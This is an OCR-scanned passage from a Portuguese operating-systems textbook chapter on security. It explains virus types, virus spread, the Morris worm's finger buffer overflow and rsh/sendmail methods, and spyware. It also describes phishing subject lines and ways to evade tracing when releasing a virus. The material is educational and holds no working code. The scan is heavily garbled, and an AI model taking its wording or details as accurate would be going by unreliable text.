dc posięao, usando endereęos rdativos em vcz de endere- 
ęos absolutom isso nao e difici] para um programatior cxpc- 
rieme e algum compiladores sotneme precisam ser solicita- 
dos para que executem lal funęao. 

Format os complexos de programas executaveis — como 
os arquivos .exe do Windows e ąuase todos os formatos bi- 
narios do UNIX — permitem que um programa tenha mul- 
tiplos segmenios de código e de dados; permitem tanibem 
quc o carregador os monte na memória c quc faęam rcalo- 
caęao durantc a execuęao. Em alguns sistemas (Windows, 
por exemplo}, todos os segmenios (scędes) sao millliplos 
de 512 byies. Se um segmentu nao esiiver completo, o !i- 
gador {linker) preenebera o restante do segmentu com 0, 
Um vLfus quc saiba disso pode ten lar se esconder nesses 
espaęos. Se ele couber totalmente, como na Figura 9 + 26(d), 
o ta ma n ho do arquivo permanecera o mesmo do arquivo 
nao infeetado — uma vantagcm evideme, ja que um vfrus 
escondido e um vfrus feliz. Vfrus que usam esse pdncfpio 
sao chamados de vi'rus de cavidade, fi claro que H se o car¬ 
regador nao carregassc as areas vazias na memória, o virus 
precisaria de uma outra maneira de inirian 
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Figura 9.26 (a) Um programa executavel. (!>} Com um virus na frente. (c) Com um vfais no finał. (0) Com um virus espalhado pelos 
I espaęos livres ao longo do programa. 


Virus residentes na memória 

Ale ngora icmos presumido que, ąuando um progra¬ 
ma infeciado e execuiado, o v(rus execula, passa o eon- 
irole para o programa rcat e saL Por outro lado, um virus 
residente na memória pcrmanece na memória (RAM) 
por [odo o tempo, ou oculto, bem no top o da memória ou 
talvez na parte mais baixa entre os arranjos de interrupęocs, 
nas liltimas centenas de bytes quc gerai nieme nao sao usa- 
das, Um vtrus bem esperto pode ale mesmo modifiear o 
mapa de bits de RAM do sistema operadonal para que o 
sistema pensc que a memória do vinis esta ocupada, a firn 
de evitar o incomodo de que o vfrus seja sobrescrito, 

Um tipico vi'rus residente na memória captura urna 
inslruęao dc desvio dc controle ou urna das cniradas do 
mor de iruerrupęóes, copiando o conieudo de urna ddas 
para uma variavd auxiMar e pondo sen próprio endereęo 
la, diredónando aąuelc dcsvio de eon irole ou aquda in- 
tenupęao para o yfms, A mdhor cscolha e a do dcsvio de 
controle de uma cha mada de sistema, Nesse caso, o virus 
conscgue exccutar (cm modo nueleo) em cada chamada de 
sistema. Quando termina de executar, cle a pena s invoea a 
chamada de sistema real, sal land o para o endereęo de des- 
vio ąuc esta salvo na variavel auxiliar. 

Por que um yimsgosiaria de executar em ca da cha ma da 
de sistema? Para infeciar programas, natural menie. O vfrus 
pode só ficar esperando, aie que surja uma chama da de sis- 
tema exec ,e emao, sabendoąue oarquivoem ąuesiao e um 
binario cxecmavel (e provavełmente lilii), infectado. Esse 
processo nao reąuer uma aimdade iniensn do disco como 
na Figura 9.25 e, porta nto, ć mc nos explicito. Caplurar to- 
das as chama das de sistema lambem da ao viru.s um grandę 
potencial para espionaros dados e realizar todo tipo de mai. 

Virus de setor de tnicializaęao 

Conforme disoitidono Capftulo 5, quando a maioria dos 
computadores e ligada, o BIOS le o registru prindpai dc inicia- 
lizaęao {master boot mord — M BR), a part ir do i md o do disco 
dc inicializaęao, para a RAM, e o execu ta. Esse programa 


determina qual partięao esta ativa e le o primeiro setor daque- 
la partięao, o setor de inicializaęao, e o executa, Entao, esse 
programa carrega o sistema operarional ou traz um carrega- 
dor para carrega-la Infclizmcmc, ha muitos a nos, um dos 
amigos de Yirgflio ievc a kicia de criar um yfrus que poderia 
sobrescreycr o registro prindpai da inicializaęao ou o setor 
da inicializaęao, com resultados devasiadores. Esses vfrus, cha- 
mados vrrus de setor de inicializaęao, sao muilo coimms. 

Normalmente, um yfrus de setor de inicializaęao, que 
indui os yfrus MBR, primeiro capia o yerdadeiro setor de 
inicializaęao para um local seguro no disco c, desse modo, 
pode carregar o sistema operacional ąuando terminar. O 
programa de formalaęao dc discos da Microsoft, o fdisk, 
ignora a primeira irlilia c, porianto, ali c um bom local para 
se esconder em maąuinas Windows. Outra opęao e usar 
qualquer setor do disco que estiver livre e, emao, atualizar 
a lisia de setores ruiris, marcando-os como defeiiuosos. Na 
verdade, se o vfms for grandę, cle podera disfaręar o que 
resta de si mesmo como setores ruins. Um vfrus realmeti- 
te agressivo poderia simplesmente alocar espaęo em disco 
para o verdadeiro scior dc inicializaęao c para ele e atua¬ 
lizar o mapa de bits do disco ou a lisia de livres. Fazer isso 
rcqucr um intimo conliecimcmo das estruturas de dados 
iinemas dos sistemas operacionais, mas YirgHio teve um 
bom professor em seu curso de sistemas operacionais e foi 
um aluno realnienie exeinplar. 

Quando o compulador e inieiado, o vfrus copia a si 
mesmo para a RAM, ou no top o, ou entre os vetores de 
interrupęoes que nao estiverem sendo usados. Nesse ino- 
mento, a maąuina esia no modo nueleo, com a MMU des- 
ligada, sem sistema operacional e sem programa anlivfrus 
executando. E a hora da fesia para os virus. Quando estiver 
prom o, ele iniciara o sistema operacional e, normalnie me, 
ficara residente na memória de modo a vigiar tu do, 

Um próbie ma, contudo, e como conseguir o controle 
novatnente. O modo usual consiste em explorar o conhe- 
cimento especifico dc como o sistema operacional geren- 
cia os vetores de interrupęoes. Por exemplo, o Windows 
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nao sobrescreve todos os vetores de intermpędes de urna 
só vez, mas carrega os drivers dos dispositivos, um por vez, 
e cada um detecta o vetor de interrupęoes necessario. Esse 
proccsso pode lcvar um minuto. 

Esse projeto da ao vfrus os instrumemos de quc de 
precisa. Eie comeęa capturando todos os vetores de Inter- 
rupęoes conforme mostra a Figura 9.27(a). A medida que 
os drivers sao carrega dos, alguns dos vetores sao sobresai- 
tos, mas, a nao ser que o driver do relógio seja carregado 
ant es, havera urna grandę quantidade de interrupęoes de 
relógio depois que o virus iniciar. A perda da intermpęao 
da impressora e mostrada na Figura 9.27(b). Assim quc o 
virus pcrcebcr quc um dc scus vciorcs dc mtemipęoes foi 
sobrcscrilo, cle podera sobrescrcvcr o vctor novamenie, 
śabendo que agora esia seguro (dc falo, alguns vetores dc 
imerrupęoes sao sobrescritos vanas vc7es duranie o proces- 
so de inicializaęao, mas o padrao e deierminfsiieo e Virgflio 
sabe isso de cor}. A recapiura da impressora e ilustrada na 
Figura 9.27(c). Quando ludo esliver carregado, o vfrus res- 
taurara lodos os vetores de interrupęoes e mant era para si 
mesmo somente o vetor da chamada de sistema que des- 
via o controle para si mesmo. Nesse momento, temos um 
virus residente na me mona com o controle das cha mada s 
de sistema. Na vcrdade, c assim quc a maioria dos vfrus 
residentes na niemot ia i nicią sua vida. 

Virus de drivers de dispositivo 

Chegar a memória desse Jeito e como na espeleologia 
(exploraęao de cavernas): e predso fazer contoręoes e se 
preocupar com as coisas que podem cair em sua cabeęa. 
Seria muito mais simples se o sistema operacional carregas- 
se ofiriaimente o vmis. Com urn pouquinho de tmbalho, 
pode-sc conseguir isso, O truque ć infectar um driver de 
dispositivo, kvando a um vinis de driver de dispositi- 
vo. No Windows e em alguns sistemas UNIX, os drivers de 
disposiiivo sao apenas programas exmiiavds qtie residetn 
no disco e que sao carregados no momenio da Inicializaęao. 


Se um deles puder ser infeciado, o virus sempre sera car¬ 
regado ofidalmente no momento da inicializaęao. Melhor 
ainda, os drivers executam no modo nucleo e, depois de ser 
carregado, um driver e cha ma do, dando ao virus a opor- 
tunidade dc capturar o vetor dc desvio para chamadas dc 
sistema. Esse fato ć, por si só, um forte argumento para quc 
sc tenham os diivcrs dc dispositivo fimcionando como um 
programa em modo usuario — se des forem infectados, 
nao sao capazes de causar tam os danos ąuanto os dtivers 
no modo nucleo, 

Vfrus de macro 

Muitos programas, como o Word e o Hxcel f permitem 
quc os usuarios esaevam macros para agrupar varios co- 
maruios que podem depois ser executados pressionando-sc 
apenas urna tecla. As macros larnbem podem ser anexadas 
a itens de menu, de modo que, ąuando um deles e selecio- 
nado, a macro seja cxecuiada. No Microsoft Office , as ma¬ 
cros podem comer programas imeiros em Visual Basic, que 
e unia linguagem de programaęao co nip] eta. As macros sao 
interpretadas e nao compiladas, mas isso afeta somente a 
vdocidade de execuęao, nao o que elas podem fazer. Como 
as macros podem ser especfficas de um do cu men to, o Office 
armazena as macros de cada do c u men to junto com o pró- 
prio documento* 

Agora e que vcm o problema. Virgilio escreve um 
docuniemo no Word e cria urna macro que dc alribui a 
funęao ABKIR ARQUJVO. A macro coniem um vitus de 
macro, Ele en tao cnvia o docu niemo por correio elel ro¬ 
ni co para a vfiima, que natura Imane oabre (presmnmdo 
que o programa dc correio detrónicoja nao ten ha kito 
isso para cle), Abrir o documcnio faz com que a macro 
ABRIR ARQUIVO exccutc. Como a macro pode center 
um programa arbiirario, ele pode fazer qualqucr coisa, 
como infectar oiitros documentos Word, apagar arqulvos 
c ate mais. Scjamos justos com a Microsoft: o Word da 
um alerta quando abre um arquivo com macros, mas a 
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maioria dos usuarios nao entende o que isso sigihfka e 
prossegue abrindo mesmo assim. Alem disso, doannen- 
tos legitimos tambem padem com er ma eros, e ha outros 
programas que nem mesmo fazem esse aierta, tornando 
muito mais dificil detectar um virus. 

Com a expansao do correio eletronico, enviar docu- 
mentos com yfrus e mb u t ido em macros e um grandę pró¬ 
bie ma. Esses yfrus sao mu i to mais faceis de escrever, eom- 
parado a esconder o verdadeiro selor de inidalizaęao em 
algurn lugar na lista de blocos ruins, ocultar o virus entre 
os vetores de intemipędes e capltirar o vetor de desvio dc 
eontrole para chamadas de sistema. Isso signilica que ca da 
vcz mais pcssoas com pouco conhccimento dc computaęao 
podem csctever vfrus, reduzindo a qualidade gcral do pro¬ 
cki lo c compromelendo a reputaęao dos escritores dc vfi us, 

Virus de código-fonte 

Os vfrus para sit as e os de selor de inidalizaęao sao al- 
lamenie esperfficos quanto a piata fot ma; os yfrus dc docu- 
mcino sao um pouco menos (o Word cxecuta no Windows 
e no Macintosh, mas nao no UN.tX), Os vfrus mais portateis 
de todos sao os vims de código-fonte. Imagine o yfrus 
da Figura 9.2 5, mas com a seguime aheraęao: em vez de 
procurar arquivos bitiarios execuiaveis, cle procura por 
programas cm C r u ma mudanęa de a pen as urna lin ha {na 
chama da a access). O procedimemo infeci dcvc ser alterado 
para que se insira a linha 

tfinefude <virus.h> 

no lopo de cada próg rama-fonie em C Unia outra inseręao 
necessaria ć a linha 

run_vinjs(); 

para ativar o vfrus, Deddir onde inserir essa linha reąuer 
alguina habilidade em analisar o código C, pois essa linha 
deve estar em um locai que pemiita sintaticamente cha- 
madas de procedimemo e tambem nao se encontrar onde 
o código seja inócuo (por exemplo, depois de um comando 
return), Inseri-lo no mdo dc um comentario tambem nao 
fundona e, deiitro de um laęo, pode ser um cxagero> Pre- 
sumindo que a chamada pode ser adeąuadamente coloca- 
da (por exeinplo r logo antes do finał de main ou anles de 
um comando return, se houver um), ąttando o pr ogra ma 
for compilado, ele contera um yfrus, importado de vints.h 
(embora projM atraia menos a atenęao, pois alguem pode- 
ila vc-lo). 

Quando o programa executa, o vfms e chamado. O vf- 
rus pode fazer o que quiser, como, por exemplo, buscar 
outros programas em C para infectar. Se encontrar algum, 
de podera induir apenas as duas linhas mostradas a dnia, 
mas isso só fimcionarn na maąuina local onde se pressu- 
poc quc virus.h estejn instalado. Para que isso dc certo em 
urna maąuina rcmota, todo o código-fonte do yfrus dcvc 
ser inclutdo. isso pode ser fcito inclnindo o código-fonte 
do yfrus como u ma stri ng pre-inidalizada, de preferencia 


como urna lista de inteiros hexadecimais de 32 bits, para 
impedir que alguem entenda o que o código faz. Essa ca- 
deia provavdmente sera muito longa, mas, nos códigos 
'muItimegalinhas' de hoje, ele pode factlmcme passar des- 
perccbido. 

Para o leitor nao iniciado, ialvez tudo isso pareęa com- 
plicado. Alguem pode ter a curiosidade de ver como fun- 
clona na pratica. E isso e possfyel. Virgtlio e um excelente 
programador e tern muito tempo livre. De urna olhada no 
caderno de in formatka de seu jomal e voce comprovara isso. 

Como os vfrus se disseminatn 

Ha varios cc nar i os para a distribinęao. Iniciemos com 
o cenario classico. Virgflio escrcvc scu yfrus, inscrc-o cm 
algum programa que ten ha escrilo (ou roubado) e comeęa 
a distribuir o programa — por exemplo, disponibilizando- 
-o em um sile da Web como um Shareware. Finalmeme, 
alguem iransfere o programa e o execuia, Ncssc momen¬ 
tu, ba varias opęoes. Para comeęar H o yirus provavelmente 
infecta outros arquivos no disco rfgido, para o caso de a 
yftima deddir comparthhar alguns desses arquivos com um 
amigo. Ele tambem pode temar infectar o selor de inidali- 
zaęao do disco egido. Unia vez infecta do o setor de iniria- 
lizaęao, e facil intdar um yfrus residente em memória H no 
modo n ii de o, nas próximas inidalizaęóes. 

Atualmente, Virgilio tem out ras opęoes dispon iveiś. O 
yfrus pode ser escrilo para verificar se a maąuina Infecta da 
esta conectada a uma rede local — algo muito comum a 
uma maąuina de uma empresa ou universidade. O vfrus 
pode, entao, comeęar a infedar os arquivos desprotegidos 
em scrvidores conectados a essa rede local Essa infccęao 
nao se estendera aos arquivos pro tęgi dos, mas os progra¬ 
mas infectados passarao a agir de maneira estranha. Um 
usuario que exccuta esse programa nomialmente pedira 
aj u da ao administrador do sistema, 0 ad ministra dor, entao, 
ten tara executar ele próprio o programa estranho, para ver 
o quc acontcce. Sc o administrador fizer isso enąuanto cs- 
tivcr conectado como superusuaria, o vfrus pode infedar 
os arquivos binanos do sistema, os drivers de dispositivos, 
o sistema operadonal e os setores de inicializaęao. Tudo 
o quc e prccjso e um erro como esse para que todas as 
maąuinas conectadas na recie local liąuem compronietidas, 

Muitas vezes, as maąuinas em uma rede local tem au¬ 
tor Iza ęa o para accssar maąuinas rcmotas pela internet ou 
em uma rede privada de computadores ou a te mesmo para 
ex ecu tar com and os remotamenie, sem passar pdo proces- 
so dc accsso ao sistema. Essa capaddade ofcrcce mais opor- 
tunidades para os yfrus sc espalharem. Assim, um pcąucno 
engano pode infectar toda uma empresa. Para impedir isso, 
todas as empresas devem ter uma polilica geral para que os 
administradores nunca cometam enganos. 

Outro modo de espalhar um vfrus e postar um pro- 
grama in fecta do em um grupo dc notfdas inewsgmip) da 
USEMET ou em urn sistema de ąuadro de avisos (BBS) para 
os quais programas sao regularmcnte postados. Tambem e 
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possfrel criar uma pa giną da Web que exija um plug-in es- 
pecial para que se possa visualiza-la e, en tao, infeciar os 
plug-ins. 

Um ataąue di fe ren te consiste cm infcctar um docu- 
niemo c envia-lo pelo correio detrdnico para muitas pes¬ 
soas ou difmidi-lo em uma lista de discussao ou em um 
grupo de not i ci as da USENET, normalnienie como um 
anexo. Mesmo pessoas que nem sonham em executar um 
programa enviado por algum estranho nao percebem que, 
dicando no anexo para abri-lo, podem liberar um vfms em 
suas maąuinas. Para piorą r, o vtrus pode procurar a lista 
dc cndereęos do usuario c cnviar mensagens para lodos os 
cadastrados ali, normalmcntc com uma linha dc Assumo 
quc pareęa legitima ou interessautc, como: 

Assunto: Mudanęa de planos 
Assunto: Re: aquela ultima mensagem 
Assunto: O cachorro morreu na noite passada 
Assunto: Estou gravemente doente 
Assunto: Eu te amo 

Quando a mensagem chega, o receptor ve que o emis- 
sor e um amigo ou um colega e, assim, nao suspeita de 
problemat Uma vez aberia a mensagem, e mu i to tarde. 
O vfrus "I LOVE YOU", que se espalhou peio mutido em 
junlio de 2000, funcionava assim e causou um bilbao de 
dólnres de prejufzos. 

Assim como ha a rcal disseminaęao dc vfrus ativos, ha 
tambćm a disseminaęao de tecnologias dc virus. Ha gm- 
pos de escriiores de virus que se comunicam ativamen- 
te pela Internet e ajudam, uns aos outros, a desenvolver 
novas tecnologias, ferramemas e efrus. A maioria desses 
participantes talvez o faęa por hobby, nao com o propósito 
de cometer crimes, mas os efeitos podem ser devastadores. 
Outra categoria de escritores de virus e a militar, que ve os 
vfrus como uma amin dc giierra potendalmente capa z dc 
a nu lar os computadorcs do inimigo, 

Outi o assunto relacionado a disseminaęao de vfrus e a 
prevenęao a detecęao, As prisoes tern notoriamente poucos 
recursos computacionais e r port anto, Virgrlio prefere evita- 
-las. Sc ele postar o vfrus inicial de sua oasa, estara corren- 
do um certo risco. Sc o ataąue obtiver succsso, a poliria 
pod era rastrea-lo procurando a mensagem com o vfrus quc 
tenha a menor data-horario, pois essa mensagem provavd- 
mente e a mais próxima a fonie do ataąue. 

Para minimizar sua expo$ięao, Virgflio pode ir a um 
cybcrcafe de uma cidade distante c accssar as varias maąui¬ 
nas dc ta. Ele pode trazer o virus em um disposkivo USB 
ou CD-ROM e le-lo ou, se as maąuinas nao tiverem por- 
tas USB ou unidades de CD-ROM, pedir para a bela jovem 
do bal ca o que, por favor, Ida o arquivo livro.doc para quc 
cle possa imprimi-lo. Uma vez no disco ngido, ele muda o 
nonie doarquivo para virus.exe e en ta o o execttta, tnie eta ml o 
loda a rede local com um vuus quc só se toina ativo um 


mes depois — só para se prevenir, caso a polfcia dedda con- 
sultar as empresas de linhas aereas, pedindo uma lista de 
todas as pessoas que viajaram naąuela semana. 

Omra allemativa e esąuecer o dispositivo USB ou o 
CD-ROM c disparar o vfrus por um sile FTP rem oto, O u 
ievar um notebook e conecta-lo a uma porta Ethernet que 
o cybcrcafe providenciou cuidadosameme para os turistas 
que desejem lor scus e-mails diariamente, Uma vez conectado 
a rede local, Yirgilio pode infcctar todas as maąuinas a cla 
conectadas. 

Ha muito mais a serdito sobre vfrus, em espedal sobre 
como tentam se esconder e como os programas amrnrus 
tentam sc l:ivrar dcl es, Yoltarcmos a esse assunto ąuando 
falarmos sobre defesas contra malware mais adiante. 

Ml 1 Vermes 

A primeira violaęao de seguranęa, cm grandę escala, 
dc computadorcs na Internet comeęou na noite dc 2 de 
novembro de 1988, ąuando um estudame de pós-gradua- 
ęao da Comell Robert Tappan Morris, lanęou um progra¬ 
ma vcrmc pela Internet, derrubando milhares de 

computadorcs dc universidadcs, corporaęocs c iaboratórios 
governamentais por todo o mimdo, a mes de ser cleteciado 
e removido. Ele nimbem inictou uma controversia que ain- 
da nao se resolvcu. Discutiremos os pornos prindpais desse 
evento a seguir. Para mais mlormaęoes tecnicas, consuke 
Spafford (1989). Para ver o ocorrido como um como poii- 
ciaL veja Hafner e Markoff (1991), 

A historia comeęou em algum moment o de 1988, 
ąuando Morris descobriu dois erros no UNIX da Berkeley, 
o que lhe possibilitou obter acesso nao autorizado a todas 
as maąuinas conectadas a Internet. Traba Iha udo sozinho, 
ele escreveu um programa que se autorreplicava, chamado 
verme r que esploraria esses erros e se replicaria em segun- 
dos, em cada maąuina a que pudesse ter tido acesso, Ele 
trabalhou duraote meses no programa, ajustando-o cuida- 
dosamente e tema udo ocultar suas pistas. 

Nao se sabe se a versao de 2 de novembro de L9S8 
foi inventada como um tesle ou se foi a versao real De 
qualquer modo, ele denubou a maioria dos sistemas Sun e 
VAX conectados a Internet algumas horas depois de lanęa- 
-lo. Nao se sabe a o certo os motivos de Morris, mas e pos- 
sfvd que sua intenęao fosse de uma grandę brincadeira de 
alta tecnologia, mas, por causa de um errode programaęao, 
saiu completaniente do controle. 

Tecnicamente, o verme consiste em dois programas: o 
inidador (hcotstrap) eo verme propriamente dito, O inicia- 
dor tinha 99 linhas em C f chamado 11,c. Ele era com pi la¬ 
do c exeauado no sistema sob ataque. Uma vez em exe- 
cuęao, conectava-se a maąuina de onde vdo, transferia a 
parte principal do vermc e, entao, o exccutava. Depois de 
enfrentar algum problema para ocultar sua existencia, o 
verme procurava pela tabela de roteamemo em sen novo 
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liospedeiro, a firn de verificar a quais maquinasaquele hos- 
pedeiro estava conectado, tentando dtssemmar o iniriador 
para essas maquinas. 

Foram ten lad os tres metodos para infectar novas ma- 
ęuinas. O metodo I temava executar urn shell remoto 
usando o comando rsh. Algumas maquinas confiam em 
outras maquinas e exeatiam o rsh sem qualquer autenii- 
caęao. Se isso fuiicionasse, o imerpreiador remoto trans- 
feriria o programa verme e continuaria a infectar novas 
maąuinas a partir de la. 

O metodo 2 usava um programa preseme em todos os 
sistemas BSD, chamado finger, que permite qne um usuario 
em qualqner kigar da Internet dtgile 

finger nome@site 

para cx!bir a informaęao sobre uma determinada pessoa 
em uma insLalaęaoespedfica. Essa informaęao consiste, em 
gcral, no nome real da pessoa, no login, nos endereęos re- 
sidendal e dc iraballio e nos respectivos tclcfones, nome 
da secretaria e scu idefone, nu mero do fax e informaęocs 
analogas a essas. E cquivalcntc a uma agenda de tdefones. 

O finger funciona da segumte maoeira: em ca da sile 
BSD, um processo em segundo piano, cha mado daemon 
finger, executa toda vez que aIguma consulia e recebula 
e respondida dc algum lugar da Internet. O que o vcrme 
fazia era chama r o finger, tendo como para metro inna siring 
de 536 bytes montada de urn modo espccial. Essa longa 
siring causava o Iransbordamento do b uff er do daemon 
e sobrescrevia su a pilha, conformc ilustrado pda Figura 
9,22 (c). O erro cxplorado pdo verme foi a lal ha do dae¬ 
mon em vcrificaro transbordamcmo do buffer, Quando o 
daemon retomava do procedimento, era bora de obier o 
que Ihe fora requisitado c, desse modo, cle nao voltava ao 
metht, mas a o procedimento que estava denlro da cadeia dc 
556 bytes, sobrescrita na pilha. Esse procedimento tentava 
cxecuiar o sh. Se fundonasse, o vermc teria agora um shdl 
executando na maąuina que estava sendo atacada por de. 

O metodo 3 dependia de uma [alha nosistema de cor- 
rcio eletronico, o sendmaii, quc permilia que um verme en- 
viasse pelo correio eletronico uma cópia do iniciador do 
verme e o fizesse exccutar. 

Urna vcz eslabdcrido, o verme tenlava quebrar as se- 
nhas dos usuarios, Morris nao pesąuisou muilo sobre como 
conseguir isso. Tu do o quc dc fez foi pedir a seu pai, um 
especialista em seguranęa da Agenda National de Segu- 
ranęa — a agenda govcrnamenial norie-americana que 
dedfra códigos —, uma cópia dc um anigo classico sobre 
o assunto quc o sr. Morris e Ken Thompson cscreveram na 
decada anterior no Bell Labs (Morris e Thompson, 1979). 
Gada senha qucbrada permitia que urn verme se conectas- 
se a qualqucr maąuina na qual o proprietario da senha 
livesse uma conta. 

Toda vcz,que o verme obtinha acesso a uma nova ma- 
quina, cle verifkava se alguma outra cópia do vcrme ja 


estava ativa alL Se estivesse, a nova cópia sala, a nao ser 
uma vez em cada sele, na qual ela prosseguia, possivd- 
mente tentando manier o vcrme propagando-se, mesmo 
se o administrador dc sistema ttvessc sua própria versao de 
Ycrmc para enganar o vcrmc real. O fatoi dc 1 para 7 criava 
muitos vermcs c foi a razao dc ter derrubado todas as ma- 
qLiinas: das ficavam infestadas dc vermcs + Sc Morris nao 
livcssc feito isso e simplesmente saldo ąuando vissc um 
outro vcrme, o verme provavelmente nao seria detectado, 

Morris foi capturado quando um de seus amigos deu 
uma entrevista a John Markoff, reporter de informatica do 
New York Times , e tentou convcncc-lo dc quc o incidente 
era, na vcrdadc, um acidcntc, que o vcrmc era inofensivo 
c que o autor lamer ta va muito* O amigo inadvertidamente 
deixou escapar que o nome dc eiiirada do criminoso era 
rtm, Corwerier Ttm no nome real do proprietario foi fadl — 
tudo o que Markoff teve de fazer foi execuiar mn finger. No 
dia seguinie, a historia estava nas primeiras paginas e im 
clusive roubou a cena das eleięoes presidenciais qtie ocor- 
reriam dentro de tres di as. 

Morris foi julgado e condenado pda cortc federab Tevc 
de pa gar uma multa de 10 mil dólares, foi condenado a 
tres a nos de condicional e a 400 horas de servięos comuni- 
tarios. Stias cusias legais provavelmeme passa ram de 150 
mil dólares. Essa sentenęa gerou unia grandę controversia. 
Muitos na comnnidade da area de computaęao alegavam 
queeie era um brilhante estudame de pós-graduaęao, cuja 
iravessura inofensiva saiu do controle. Nada no verme su- 
geria quc Morris cstivesse tentando roubar ou danificar 
alguma coiso. Outros acreditavam quc elc cometera um 
crime gravc c quc dcvcria ter ido para a prisao. Mais tar- 
dc, Morris eon dniu scu PhD cm Harvard c, boje em dia, ć 
professor do MIT, 

Um efeito permanente desse incidente foi a fundaęao 
da CERT {Computer Emergency Response Team — equipe 
de respostas a emergencias computadonais), que oferece 
um local centralizado para relatar tcntativas de imasao c 
um grupo de cspedalistas para analisar os problcmas dc 
seguranęa c desenvolver reparos cm projetos. Embora cssa 
aęao rcalmente Senha significado um passo a frentę, tam- 
bem fot um passo para iras, A CERT coleta tnformaęóes 
sobre as fal ha s de sistemas que po dem ser a ta ca das e como 
repara-las. Por necessidade, ela ctrcula essa informaęao, 
amplamente, para milhares de administradores de sistemas 
pela Internet. Infelizmente, os caras maus (possivelmente 
posando de administradores de sistemas) tambem podem 
obier o relatório dc falhas c explorar essas brechas em ho¬ 
ras (ou atc mesmo cm dias) antes que das sejam fcchadas. 

Uma yąriedade de ouiros tipos de verme foi disiribufda 
desde o de Morris. Eles operam da mesma forma e dile¬ 
rem somente nos erros de software que exploram. Yermes 
tendem a se espalhar muito mais rapido do que os vfrus 
porque se movimentam sozinlios. Em consequencia disso, 
a tecnologia antivermes esta sendo deseńvolvida de modo 




Capiłulo 9 Seguranęa 423 


a detectar novos vermes assim que surgirem, em vez de 
esperar que sejam catalogados e registrados em urn banco 
de dados central (Portokalidis e Bos, 2007). 

9JA I Spyware 

Urn Lipo cada vez mais cornuni de malware e o spy¬ 
ware, Grossa mado, o spyware ć u ni software earregado 
sorratei ranienie em um PC sem conhedmento de sen pro- 
prielario e que fundona cm seus bastidores fazendo cotsas 
sem ąuv ningucm saiba. Sua dcfmięao, emretanto, nao c 
la cii, A altmlizaęao do Windows, por exemplo, copia au- 
tomatica menie extcmqęs dc seguranęa para as maquinas 
sem que o usuario scja in forma do, Ana toga nieme, muitos 
aiTlivfrus atualizam-se automalicamenie. Ncnhum ddcs e 
considcrado spyware, Se Potter Stewart estivesse vivo, pro- 
vavelmente diria; "Nao consigo defmir spyware, mas reco- 
nheęo um ąuando o ve]oV 

Muitos lent a ram definir spyware. Barwinski et al. 
(2006) disseram que de tern ąuatro caractensticas, Pti- 
meiro, se esconde, de modo quc a vUima nao o encontre 
fadlmeruc, Segundo, coleta dados sobre o usuario (sites 
visiiados H senhas e ate numeros de cartao de credito), Tcr- 
ceiro, envia ao sen mesirc rcmoio as informaęoes colcta- 
das. E ąuario, tema sobreviver a determmadas teotaiivas 
de remoęao. Aletn disso, alguns tipos de spyware alteram 
a configuraęao e executarn out ras tarefas perlu rbadoras e 
maliciosas, eon formę descrevemos a seguir. 

Barwinski et al. dmdiram o spyware em tres grandes 
categorias. A primeira e a dc marketing: o spyware simples- 
mente colcta informaęoes e envia ao sen mestre, cm geral 
para melhor direcionamento dc propaganda a maquinas 
espedficas. A segunda catcgorla e a de yigilanda, na qual 
as empresas intenrionaimente colocam spyware nas ma- 
ąuinas dos empregados para comrolar o que fazem e quais 
sites visitam. A lerceira e semellianie ao malware dassico, 
no qnal a maąuina inlectada torna-se parte de um cxćrcito 
de zumbis esperando as ordens de alaąue de seu meslre. 

Os pcsąuisadores realizaram um experhnento e visi- 
taram cinco mil sites para descobrir quais delcs continham 
spyware. Elcs obscrvaram que os prindpais pulvcrizado- 
res de spyware sao os sites reladonados a entreteniniemo 
adulto, programas pi rai as, viagens on-linę e imóvds. 

Um estudo ainda mais abrangente foi realizado na 
Universidade de Washington (Moslichuk et al., 2006), 
que visitou ccrca de 18 milhóes dc URLs e descobriu que 
quase 6 por ccnto continham spyware. Nao ć surpresa, 
porta nto, qu c cm um estudo da AOL/NCSA dla do por 
eles 80 por ccnto dos computadores domćsticos inspccio- 
nados estiyessem infectados por spyware, com urna media 
de 93 instandas de spyware por maquma, O estudo da 
Uniyersidade de Washington descobriu que sites adultos, 
de celebridades e de oferta de papeis de parede apresema- 


vam as taxas mais altas de infecęao. Os sites de yiagens e 
imóveis nao foram avaliados. 

Como o spyware se espalha 

Urna pergunta óbvia neste momento ć: "Como um 
computador c infectado por spyware?". Urna das manei- 
ras e identica a quc acomecc com malware: por nieio de 
um cavalo de Troi a. Um volume consideravd de programas 
gratuitos contem spyware, e o autor do software ganha di- 
nhciro com isso* Os programas P2P para compartilhamcn- 
to de arquivos (Kozaa, por exemplo) estao infestados de 
spyware. Muitos sites tambem exibem anuncios quc dire- 
cionam os vi$itanies a paginas lotadas de spyware. 

Outra rota importante de infecęao e a chamada de 
contagio por contato. E possfyei pegar spyware (na ver- 
dade, quaiqucr malware) simplesmenie visitando urna 
pa giną inlectada, Existem tres variaęoes dessa tecnologia, 
Primeiro, a pagina da Web pode redirceionar o navegador 
para um arquivo exeaitavel (.cat). Quando o navegador 
detecta o arquivo, abre urna caixa de dialogo perguntando 
ao usuario se ele deseja execuiar ou salvar o arquivo. Como 
as cópias legftimas de arquivo usam o mesmo mecanismo, 
muitos usuarios simplesmenie clicam cm 'ExecuiaiA o quc 
faz com quc o navegador copie e execute o software. A essa 
a hura, a maquina ja esta infcctada c o spyware esta iivrc 
para fazer o que desejar. 

A segunda rota mais comum e a barra de ferranien- 
las infectada. Tanio o Internet Explorer quanto o Firefox 
su partam a instaiaęao de barras de ferramenias de tercci- 
ros, Alguns criadorcs de spyware criam urna barra de fer- 
ramentas interessanie, com alguns recursos ulcis, e fazem 
propaganda dola como um ótimo módulo gra tui to. Aqueles 
que instalarem a barra de ferramentas ievam o spyware. A 
popular barra de ferramentas Alexa, por exempIo, contem 
spyware. Em essencia, esse esquema e um eavalo de Troia 
empacotado de maneira diferente. 

A teredra variedade de spyware e mais malvada, Mui- 
tas paginas da Web uiilizam urna tecnologia da Microsoft 
denominada controie ActiveX, que sao programas Pen¬ 
tium binarios que se conectam ao Internet ExpIorer e am- 
pliam suas fundonalidades, por exempło, na interpretaęao 
de tipos especiais de paginas de imagens, audio ou vtdeo. 
Em pnneipio, essa tecnologia e perfeitamente legftinia. Na 
pratica, cla e cxt rem a nie nic perigosą e provavdmente c 
o metodo mais comum para que a infecęao por spyware 
aconteęa. O alvo dessa abordagem e sempre o linernei Ex- 
plorer (IE), nunca o Firefox ou outros navegadores. 

Quando urna pagina com controlc ActivcX ć yisitada, 
o quc acomcce depende das configuraęoes de seguranęa 
do 1H. Se estiyerein definidos como nivel Baixo, o spy¬ 
